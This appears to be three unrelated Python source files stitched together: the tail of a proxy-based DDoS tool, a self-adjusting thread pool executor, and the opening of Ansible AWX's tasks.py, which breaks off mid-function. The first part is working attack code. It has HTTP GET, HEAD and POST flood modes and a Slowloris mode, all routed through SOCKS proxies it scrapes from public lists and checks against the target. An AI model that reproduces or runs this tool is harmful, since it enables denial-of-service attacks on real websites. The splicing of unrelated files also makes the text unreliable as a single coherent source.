check_socks(ms)
def SetupIndDict():
global ind_dict
for proxy in proxies:
ind_dict[proxy.strip()] = 0
def OutputToScreen(ind_rlock):
global ind_dict
i = 0
sp_char = ["|","/","-","\\"]
while 1:
if i > 3:
i = 0
print("{:^70}".format("Proxies attacking status"))
print("{:^70}".format("IP:PORT <-> RPS "))
#1. xxx.xxx.xxx.xxx:xxxxx ==> Rps: xxxx
ind_rlock.acquire()
top10 = sorted(ind_dict, key=ind_dict.get, reverse=True)
for num in range(10):
top = "none"
rps = 0
if len(ind_dict) != 0:
top = top10[num]
rps = ind_dict[top]
ind_dict[top] = 0
print("{:^70}".format("{:2d}. {:^22s} | Rps: {:d}".format(num+1,top,rps)))
total = 0
for k,v in ind_dict.items():
total = total + v
ind_dict[k] = 0
ind_rlock.release()
print("{:^70}".format(" ["+sp_char[i]+"] CC attack | Total Rps:"+str(total)))
i+=1
time.sleep(1)
print("\n"*100)
def cc(event,socks_type,ind_rlock):
global ind_dict
header = GenReqHeader("get")
proxy = Choice(proxies).strip().split(":")
add = "?"
if "?" in path:
add = "&"
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for _ in range(multiple+1):
get_host = "GET " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
sent = s.send(str.encode(request))
if not sent:
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:
s.close()
def head(event,socks_type,ind_rlock):#HEAD MODE
global ind_dict
header = GenReqHeader("head")
proxy = Choice(proxies).strip().split(":")
add = "?"
if "?" in path:
add = "&"
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for _ in range(multiple+1):
head_host = "HEAD " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
sent = s.send(str.encode(request))
if not sent:
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:#dirty fix
s.close()
def post(event,socks_type,ind_rlock):
global ind_dict
request = GenReqHeader("post")
proxy = Choice(proxies).strip().split(":")
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if str(port) == '443': # //AUTO Enable SSL MODE :)
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for _ in range(multiple+1):
sent = s.send(str.encode(request))
if not sent:
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:
s.close()
socket_list=[]
def slow(conn,socks_type):
proxy = Choice(proxies).strip().split(":")
for _ in range(conn):
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(1)
s.connect((str(target), int(port)))
if str(port) == '443':
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent()).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
proxy = Choice(proxies).strip().split(":")#Only change proxy when error, increase the performance
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
while True:
for s in list(socket_list):
try:
s.send("X-a: {}\r\n".format(Intn(1, 5000)).encode("utf-8"))
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
socket_list.remove(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
proxy = Choice(proxies).strip().split(":")
for _ in range(conn - len(socket_list)):
try:
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(1)
s.connect((str(target), int(port)))
if int(port) == 443:
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
proxy = Choice(proxies).strip().split(":")
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
pass
nums = 0
def checking(lines,socks_type,ms,rlock,):#Proxy checker coded by Leeon123
global nums
global proxies
proxy = lines.strip().split(":")
if len(proxy) != 2:
rlock.acquire()
proxies.remove(lines)
rlock.release()
return
err = 0
while True:
if err == 3:
rlock.acquire()
proxies.remove(lines)
rlock.release()
break
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(ms)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
sent = s.send(str.encode("GET / HTTP/1.1\r\n\r\n"))
if not sent:
err += 1
s.close()
break
except:
err +=1
nums += 1
def check_socks(ms):#Coded by Leeon123
global nums
thread_list=[]
rlock = threading.RLock()
for lines in list(proxies):
if choice == "5":
th = threading.Thread(target=checking,args=(lines,5,ms,rlock,))
th.start()
if choice == "4":
th = threading.Thread(target=checking,args=(lines,4,ms,rlock,))
th.start()
thread_list.append(th)
time.sleep(0.01)
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
for th in list(thread_list):
th.join()
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
print("\r\n> Checked all proxies, Total Worked:"+str(len(proxies)))
ans = input("> Do u want to save them in a file? (y/n, default=y)")
if ans == "y" or ans == "":
if choice == "4":
with open("socks4.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks4.txt.")
elif choice == "5":
with open("socks5.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks5.txt.")
def check_list(socks_file):
print("> Checking list")
temp = open(socks_file).readlines()
temp_list = []
for i in temp:
if i not in temp_list:
if ':' in i:
temp_list.append(i)
rfile = open(socks_file, "wb")
for i in list(temp_list):
rfile.write(bytes(i,encoding='utf-8'))
rfile.close()
def downloadsocks(choice):
if choice == "4":
f = open("socks4.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks4",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt",timeout=5)
f.write(r.content)
f.close()
except:
f.close()
try:#credit to All3xJ
r = requests.get("https://www.socks-proxy.net/",timeout=5)
part = str(r.content)
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("socks4.txt","a")
out_file.write(proxies)
out_file.close()
except:
pass
print("> Have already downloaded socks4 list as socks4.txt")
if choice == "5":
f = open("socks5.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5",timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks5",timeout=5)
f.write(r.content)
f.close()
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/hookzof/socks5_list/master/proxy.txt",timeout=5)
f.write(r.content)
f.close()
except:
f.close()
print("> Have already downloaded socks5 list as socks5.txt")
def main():
global multiple
global choice
global data
global mode2
global cookies
global brute
print("> Mode: [cc/post/head/slow/check]")
mode = InputOption("> Choose Your Mode (default=cc) :",["cc","post","head","slow","check"],"cc")
url = str(input("> Input the target url:")).strip()
ParseUrl(url)
if mode == "post":
mode2 = InputOption("> Customize post data? (y/n, default=n):",["y","n","yes","no"],"n")
if mode2 == "y":
data = open(input("> Input the file's path:").strip()).readlines()
data = ' '.join([str(txt) for txt in data])
choice2 = InputOption("> Customize cookies? (y/n, default=n):",["y","n","yes","no"],"n")
if choice2 == "y":
cookies = str(input("Plese input the cookies:")).strip()
choice = InputOption("> Choose your socks mode(4/5, default=5):",["4","5"],"5")
if choice == "4":
socks_type = 4
else:
socks_type = 5
if mode == "check":
CheckerOption()
print("> End of process")
return
if mode == "slow":
thread_num = str(input("> Connections(default=400):"))
else:
thread_num = str(input("> Threads(default=400):"))
if thread_num == "":
thread_num = int(400)
else:
try:
thread_num = int(thread_num)
except:
sys.exit("Error thread number")
CheckerOption()
ind_rlock = threading.RLock()
if mode == "slow":
input("Press Enter to continue.")
th = threading.Thread(target=slow,args=(thread_num,socks_type,))
th.setDaemon(True)
th.start()
else:
multiple = str(input("> Input the Magnification(default=100):"))
if multiple == "":
multiple = int(100)
else:
multiple = int(multiple)
brute = str(input("> Enable boost mode[beta](y/n, default=n):"))
if brute == "":
brute = False
elif brute == "y":
brute = True
elif brute == "n":
brute = False
event = threading.Event()
print("> Building threads...")
SetupIndDict()
build_threads(mode,thread_num,event,socks_type,ind_rlock)
event.clear()
input("Press Enter to continue.")
event.set()
threading.Thread(target=OutputToScreen,args=(ind_rlock,),daemon=True).start()
while True:
try:
time.sleep(0.1)
except KeyboardInterrupt:
break
if __name__ == "__main__":
main()#Coded by Vesah #CyberTeam
|
custom_threadpool_executor.py
|
"""
可自动实时调节线程数量的线程池。
比官方ThreadpoolExecutor的改进是
1.有界队列
2.实时调节线程数量,指的是当任务很少时候会去关闭很多线程。官方ThreadpoolExecurot只能做到忙时候开启很多线程,但不忙时候线程没有关闭线程。
linux系统能承受的线程总数有限,一般不到2万。
"""
import atexit
import queue
import sys
import threading
import time
import weakref
from function_scheduling_distributed_framework.utils import LoggerMixin, nb_print, LoggerLevelSetterMixin, LogManager
from function_scheduling_distributed_framework.concurrent_pool.custom_evenlet_pool_executor import check_evenlet_monkey_patch
from function_scheduling_distributed_framework.concurrent_pool.custom_gevent_pool_executor import check_gevent_monkey_patch
_shutdown = False
_threads_queues = weakref.WeakKeyDictionary()
def _python_exit():
global _shutdown
_shutdown = True
items = list(_threads_queues.items())
for t, q in items:
q.put(None)
for t, q in items:
t.join()
atexit.register(_python_exit)
class _WorkItem(LoggerMixin):
def __init__(self, fn, args, kwargs):
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
# noinspection PyBroadException
try:
self.fn(*self.args, **self.kwargs)
except BaseException as exc:
self.logger.exception(f'Error in function {self.fn.__name__}, caused by {type(exc)} {exc}')
def __str__(self):
return f'{(self.fn.__name__, self.args, self.kwargs)}'
def check_not_monkey():
if check_gevent_monkey_patch(raise_exc=False):
raise Exception('Please do not apply the gevent monkey patch')
if check_evenlet_monkey_patch(raise_exc=False):
raise Exception('Please do not apply the eventlet monkey patch')
class CustomThreadPoolExecutor(LoggerMixin, LoggerLevelSetterMixin):
def __init__(self, max_workers=None, thread_name_prefix=''):
"""
Keeps the same parameter names and count as the official concurrent.futures.ThreadPoolExecutor and the modified BoundedThreadPoolExecutor, for compatibility.
:param max_workers:
:param thread_name_prefix:
"""
self._max_workers = max_workers or 4
self._min_workers = 5
self._thread_name_prefix = thread_name_prefix
self.work_queue = queue.Queue(max_workers)
# self._threads = set()
self._threads = weakref.WeakSet()
self._lock_compute_threads_free_count = threading.Lock()
self.threads_free_count = 0
self._shutdown = False
self._shutdown_lock = threading.Lock()
def set_min_workers(self, min_workers=10):
self._min_workers = min_workers
return self
def change_threads_free_count(self, change_num):
with self._lock_compute_threads_free_count:
self.threads_free_count += change_num
def submit(self, func, *args, **kwargs):
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError('Cannot submit new tasks to the thread pool after shutdown')
self.work_queue.put(_WorkItem(func, args, kwargs))
self._adjust_thread_count()
def _adjust_thread_count(self):
# if len(self._threads) < self._threads_num:
self.logger.debug((self.threads_free_count, len(self._threads), len(_threads_queues), get_current_threads_num()))
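# Spawn an extra worker only while idle threads are scarcer than the minimum and the pool is still below max_workers.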
if self.threads_free_count < self._min_workers and len(self._threads) < self._max_workers:
# t = threading.Thread(target=_work,
# args=(self._work_queue,self))
t = _CustomThread(self).set_log_level(self.logger.level)
t.daemon = True
t.start()
self._threads.add(t)
_threads_queues[t] = self.work_queue
def shutdown(self, wait=True):
with self._shutdown_lock:
self._shutdown = True
self.work_queue.put(None)
if wait:
for t in self._threads:
t.join()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown(wait=True)
return False
class _CustomThread(threading.Thread, LoggerMixin, LoggerLevelSetterMixin):
def __init__(self, executorx: CustomThreadPoolExecutor):
super().__init__()
self._executorx = executorx
self._run_times = 0
# noinspection PyProtectedMember
def _remove_thread(self, stop_reason=''):
# noinspection PyUnresolvedReferences
self.logger.debug(f'Stopping thread {self._ident}, reason: {stop_reason}')
self._executorx.change_threads_free_count(-1)
self._executorx._threads.remove(self)
_threads_queues.pop(self)
# noinspection PyProtectedMember
def run(self):
# noinspection PyUnresolvedReferences
self.logger.debug(f'Started new thread {self._ident}')
self._executorx.change_threads_free_count(1)
while True:
try:
work_item = self._executorx.work_queue.get(block=True, timeout=60)
except queue.Empty:
# continue
# self._remove_thread()
# break
if self._executorx.threads_free_count > self._executorx._min_workers:
self._remove_thread(f'This thread has had no task for over 60 seconds; idle threads in the pool: {self._executorx.threads_free_count}, exceeding the configured minimum of {self._executorx._min_workers}')
break  # Exit the while loop, which is what actually ends and destroys the thread; _remove_thread above only does the bookkeeping.
else:
continue
# nb_print(work_item)
if work_item is not None:
self._executorx.change_threads_free_count(-1)
work_item.run()
del work_item
self._executorx.change_threads_free_count(1)
continue
if _shutdown or self._executorx._shutdown:
self._executorx.work_queue.put(None)
break
process_name_set = set()
logger_show_current_threads_num = LogManager('show_current_threads_num').get_logger_and_add_handlers(formatter_template=5, log_filename='show_current_threads_num.log', do_not_use_color_handler=True)
def show_current_threads_num(sleep_time=60, process_name='', block=False):
process_name = sys.argv[0] if process_name == '' else process_name
def _show_current_threads_num():
while True:
# logger_show_current_threads_num.info(f'Concurrency of process {process_name} --> {threading.active_count()}')
nb_print(f'Thread count of process {process_name} --> {threading.active_count()}')
time.sleep(sleep_time)
if process_name not in process_name_set:
if block:
_show_current_threads_num()
else:
t = threading.Thread(target=_show_current_threads_num, daemon=True)
t.start()
process_name_set.add(process_name)
def get_current_threads_num():
return threading.active_count()
if __name__ == '__main__':
from function_scheduling_distributed_framework.utils import decorators
from function_scheduling_distributed_framework.concurrent_pool.bounded_threadpoolexcutor import BoundedThreadPoolExecutor
# @decorators.keep_circulating(1)
def f1(a):
time.sleep(0.2)
nb_print(f'{a} .......')
# raise Exception('raise a test error')
# show_current_threads_num()
pool = CustomThreadPoolExecutor(200).set_log_level(10).set_min_workers()
# pool = BoundedThreadPoolExecutor(200)  # compare against the previously written BoundedThreadPoolExecutor
show_current_threads_num(sleep_time=5)
for i in range(300):
time.sleep(0.3)  # Simulate sparse task arrival: f1 is quick, so only a few threads are needed; this is one advantage of CustomThreadPoolExecutor over BoundedThreadPoolExecutor.
pool.submit(f1, str(i))
nb_print(6666)
# pool.shutdown(wait=True)
pool.submit(f1, 'yyyy')
# The loop below keeps the main thread alive; comment it out to test the behaviour when the main thread exits.
while True:
time.sleep(10)
|
tasks.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError, ProgrammingError, connection
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now, timedelta
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.isolated import manager as isolated_manager
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in a different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
if Instance.objects.me().is_controller():
awx_isolated_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on logging settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
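# Hostnames belonging to isolated groups (groups that have a controller); these are excluded from the policy computation below.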
iso_hostnames = set([])
for ig in all_groups:
if ig.controller_id is not None:
iso_hostnames.update(ig.policy_instance_list)
considered_instances = [inst for inst in all_instances if inst.hostname not in iso_hostnames]
total_instances = len(considered_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
if ig.controller_id is None:
actual_groups.append(group_actual)
else:
# For isolated groups, _only_ apply the policy_instance_list
# do not add to in-memory list, so minimum rules not applied
logger.debug('Committing instances to isolated group {}'.format(ig.name))
ig.instances.set(group_actual.instances)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in considered_instances if i.managed_by_policy]
logger.debug("Total non-isolated instances:{} available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to non-isolated groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
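# Expand the changed keys with their directly dependent settings (only the originally changed keys are walked).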
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
